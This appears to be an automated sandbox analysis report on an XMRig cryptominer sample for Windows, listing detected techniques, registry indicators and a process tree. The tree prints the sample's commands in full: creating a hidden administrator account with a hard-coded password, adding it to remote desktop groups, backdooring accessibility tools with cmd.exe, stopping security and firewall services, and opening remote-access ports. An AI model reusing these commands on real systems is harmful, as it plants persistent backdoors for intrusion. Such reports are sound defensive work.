xmrig | 46dc49be65d7165e2a6009854a4f27f0088230199e61e0555cb1bd266535874a

Analysis

max time kernel
42s
max time network
6s
platform
windows7_x64
resource
win7v200722
submitted
11-08-2020 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

foo/bc6536b86b04cf5b3bf7cd353d615ab9.exe

Score

10^/10

xmrig discovery evasion miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 1 IoCs

pid	Process
1784	TSPatch.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral149/files/0x0003000000013263-17.dat	upx
behavioral149/files/0x0003000000013263-19.dat	upx

Loads dropped DLL 1 IoCs

pid	Process
732	bc6536b86b04cf5b3bf7cd353d615ab9.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1676	takeown.exe
2020	takeown.exe

Modifies WinLogon 2 TTPs 13 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\helpassistant = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ontar = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\SYSTEМ = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Аdministrator = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Aдминистратор = "0"	reg.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ontar = "0"	reg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\dllcache\wsethc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dllcache\wsethc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sethc.exe	cmd.exe
File created	C:\Windows\SysWOW64\sethc.exe	cmd.exe
File created	C:\Windows\SysWOW64\dllcache\sethc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dllcache\sethc.exe	cmd.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\lastgood\SysWOW64\sethc.exe	cmd.exe
File created	C:\Windows\drmsvc.exe	cmd.exe
File opened for modification	C:\Windows\drmsvc.exe	cmd.exe
File created	C:\Windows\wpmsvc.exe	cmd.exe
File opened for modification	C:\Windows\wpmsvc.exe	cmd.exe
File created	C:\Windows\LastGood\SysWOW64\sethc.exe	cmd.exe
File created	C:\Windows\ServicePackFiles\i386\sethc.exe	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1784	TSPatch.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: SeTakeOwnershipPrivilege	2020	takeown.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	824	WMIC.exe
Token: SeSecurityPrivilege	824	WMIC.exe
Token: SeTakeOwnershipPrivilege	824	WMIC.exe
Token: SeLoadDriverPrivilege	824	WMIC.exe
Token: SeSystemProfilePrivilege	824	WMIC.exe
Token: SeSystemtimePrivilege	824	WMIC.exe
Token: SeProfSingleProcessPrivilege	824	WMIC.exe
Token: SeIncBasePriorityPrivilege	824	WMIC.exe
Token: SeCreatePagefilePrivilege	824	WMIC.exe
Token: SeBackupPrivilege	824	WMIC.exe
Token: SeRestorePrivilege	824	WMIC.exe
Token: SeShutdownPrivilege	824	WMIC.exe
Token: SeDebugPrivilege	824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	824	WMIC.exe
Token: SeRemoteShutdownPrivilege	824	WMIC.exe
Token: SeUndockPrivilege	824	WMIC.exe
Token: SeManageVolumePrivilege	824	WMIC.exe
Token: 33	824	WMIC.exe
Token: 34	824	WMIC.exe
Token: 35	824	WMIC.exe
Token: SeIncreaseQuotaPrivilege	824	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 732 wrote to memory of 1648	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	24
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1524	1648	cmd.exe	26
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1648 wrote to memory of 1496	1648	cmd.exe	27
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1496 wrote to memory of 1692	1496	net.exe	28
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1648 wrote to memory of 1800	1648	cmd.exe	29
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 1800 wrote to memory of 1828	1800	net.exe	30
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 732 wrote to memory of 1832	732	bc6536b86b04cf5b3bf7cd353d615ab9.exe	31
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1832 wrote to memory of 1876	1832	cmd.exe	33
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1648 wrote to memory of 1896	1648	cmd.exe	34
PID 1832 wrote to memory of 1912	1832	cmd.exe	35

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1876	attrib.exe
1808	attrib.exe
1904	attrib.exe

C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe
"C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\U.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1648
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\net.exe
    net user ontar /DELETE
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ontar /DELETE
      4⤵
      PID:1692
- - C:\Windows\SysWOW64\net.exe
    net user ontar Preaba1! /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ontar Preaba1! /add
      4⤵
      PID:1828
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators ontar /add
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators ontar /add
      4⤵
      PID:1904
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" ontar /add
    3⤵
    PID:1148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add
      4⤵
      PID:1808
- - C:\Windows\SysWOW64\net.exe
    net localgroup Администраторы ontar /add
    3⤵
    PID:1596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Администраторы ontar /add
      4⤵
      PID:1624
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Пользователи удаленного рабочего стола" ontar /add
    3⤵
    PID:2040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" ontar /add
      4⤵
      PID:1988
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrateurs ontar /add
    3⤵
    PID:824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrateurs ontar /add
      4⤵
      PID:2044
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Utilisateurs du Bureau а distance" ontar /add
    3⤵
    PID:316
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Utilisateurs du Bureau а distance" ontar /add
      4⤵
      PID:1092
- - C:\Windows\SysWOW64\net.exe
    net localgroup Beheerders ontar /add
    3⤵
    PID:812
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Beheerders ontar /add
      4⤵
      PID:540
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop-gebruikers" ontar /add
    3⤵
    PID:736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop-gebruikers" ontar /add
      4⤵
      PID:1472
- - C:\Windows\SysWOW64\net.exe
    net localgroup Beheerders ontar /add
    3⤵
    PID:1520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Beheerders ontar /add
      4⤵
      PID:1372
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop gebruikers" ontar /add
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop gebruikers" ontar /add
      4⤵
      PID:1820
- - C:\Windows\SysWOW64\net.exe
    net localgroup ??? ontar /add
    3⤵
    PID:1872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup ??? ontar /add
      4⤵
      PID:1836
- - C:\Windows\SysWOW64\net.exe
    net localgroup "??????" ontar /add
    3⤵
    PID:1368
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "??????" ontar /add
      4⤵
      PID:1876
- - C:\Windows\SysWOW64\net.exe
    net localgroup ??? ontar /add
    3⤵
    PID:1916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup ??? ontar /add
      4⤵
      PID:1940
- - C:\Windows\SysWOW64\net.exe
    net localgroup "??????????????" ontar /add
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "??????????????" ontar /add
      4⤵
      PID:1932
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administratorzy ontar /add
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administratorzy ontar /add
      4⤵
      PID:1968
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Uzytkownicy pulpitu zdalnego" ontar /add
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" ontar /add
      4⤵
      PID:1764
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administratorer ontar /add
    3⤵
    PID:1900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administratorer ontar /add
      4⤵
      PID:1808
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Brukere av eksternt skrivebord" ontar /add
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Brukere av eksternt skrivebord" ontar /add
      4⤵
      PID:1632
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administradores ontar /add
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administradores ontar /add
      4⤵
      PID:1596
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Usuarios Remote Desktop" ontar /add
    3⤵
    PID:1088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Usuarios Remote Desktop" ontar /add
      4⤵
      PID:2000
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administradores ontar /add
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administradores ontar /add
      4⤵
      PID:1108
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Usuarios de escritorio remoto" ontar /add
    3⤵
    PID:268
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add
      4⤵
      PID:824
- - C:\Windows\SysWOW64\net.exe
    net localgroup gli amministratori ontar /add
    3⤵
    PID:660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup gli amministratori ontar /add
      4⤵
      PID:1336
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Utenti desktop remoto" ontar /add
    3⤵
    PID:960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add
      4⤵
      PID:696
- - C:\Windows\SysWOW64\net.exe
    net localgroup administratorer ontar /add
    3⤵
    PID:844
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administratorer ontar /add
      4⤵
      PID:1600
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Anvandare av fjarrskrivbord" ontar /add
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Anvandare av fjarrskrivbord" ontar /add
      4⤵
      PID:1440
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administratoren ontar /add
    3⤵
    PID:1512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administratoren ontar /add
      4⤵
      PID:1568
- - C:\Windows\SysWOW64\net.exe
    net localgroup "RemoteDesktopBenutzer" ontar /add
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "RemoteDesktopBenutzer" ontar /add
      4⤵
      PID:1844
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administratoren ontar /add
    3⤵
    PID:1372
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administratoren ontar /add
      4⤵
      PID:1824
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Benutzer" ontar /add
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Benutzer" ontar /add
      4⤵
      PID:1828
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administradores ontar /add
    3⤵
    PID:1920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administradores ontar /add
      4⤵
      PID:1784
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add
    3⤵
    PID:1940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add
      4⤵
      PID:1928
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators ontar /add
    3⤵
    PID:1404
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators ontar /add
      4⤵
      PID:728
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Utenti desktop remoto" ontar /add
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add
      4⤵
      PID:1588
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administradores ontar /add
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administradores ontar /add
      4⤵
      PID:1640
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Usuarios de escritorio remoto" ontar /add
    3⤵
    PID:1900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add
      4⤵
      PID:1564
- - C:\Windows\SysWOW64\net.exe
    net localgroup yoneticileri ontar /add
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup yoneticileri ontar /add
      4⤵
      PID:1124
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Uzak masaustu kullan?c?lar?" ontar /add
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Uzak masaustu kullan?c?lar?" ontar /add
      4⤵
      PID:1216
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no
    3⤵
    PID:756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no
      4⤵
      PID:1156
- - C:\Windows\SysWOW64\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:1140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:824
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpassistant /t REG_DWORD /d "00000000" /f
    3⤵
    - Modifies WinLogon
    PID:1516
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f
    3⤵
    - Modifies WinLogon
    PID:1336
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTEМ /t REG_DWORD /d "00000000" /f
    3⤵
    - Modifies WinLogon
    PID:1036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Аdministrator /t REG_DWORD /d "00000000" /f
    3⤵
    - Modifies WinLogon
    PID:696
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Aдминистратор /t REG_DWORD /d "00000000" /f
    3⤵
    - Modifies WinLogon
    PID:992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPLifeInterval /t REG_DWORD /d "00005180" /f
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "FFFFFF9D" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\sc.exe
    sc config rasman start= auto
    3⤵
    PID:812
- - C:\Windows\SysWOW64\sc.exe
    sc config remoteaccess start= auto
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\net.exe
    net start rasman
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start rasman
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\net.exe
    net start remoteaccess
    3⤵
    PID:1700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start remoteaccess
      4⤵
      PID:1512
- - C:\Windows\SysWOW64\sc.exe
    sc config wscsvc start= disabled
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\sc.exe
    sc stop wscsvc
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\sc.exe
    sc stop SharedAccess
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\sc.exe
    sc create tlntsvr binPath= tlntsvr.exe
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\sc.exe
    sc config tlntsvr start= auto
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\net.exe
    net start tlntsvr
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start tlntsvr
      4⤵
      PID:1952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 3389 system
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening TCP 4899 system
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Documents and settings\ontar" /S /D
    3⤵
    - Views/modifies file attributes
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    PID:1652
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1544
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:1632
- - C:\Windows\SysWOW64\net.exe
    net user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    PID:2000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:1180
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators ontar /add
    3⤵
    PID:1120
  - - C:\Windows\SysWOW64\net1.exe
